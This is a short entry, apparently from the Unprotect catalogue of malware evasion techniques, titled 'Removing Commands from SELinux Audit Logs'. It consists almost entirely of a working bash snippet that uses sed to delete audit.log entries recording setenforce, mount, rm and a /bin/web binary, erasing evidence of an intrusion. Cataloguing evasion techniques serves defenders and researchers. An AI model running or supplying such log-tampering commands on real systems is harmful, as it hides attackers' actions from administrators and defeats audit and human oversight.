Linux bash / Removing Commands from SELinux Audit Logs
| Author | Unprotect |
| Platform | Linux |
| Language | bash |
| Technique | Removing Commands from SELinux Audit Logs |
Code
```bash
# Navigate to the SELinux audit log directory
cd /data/var/log/audit/
# Remove specific executed commands from the audit log
sed -i '/bin\/web/d' audit.log
sed -i '/setenforce/d' audit.log
sed -i '/mount/d' audit.log
sed -i '/bin\/rm/d' audit.log
```
| Created | January 16, 2025 |
| Last Revised | January 16, 2025 |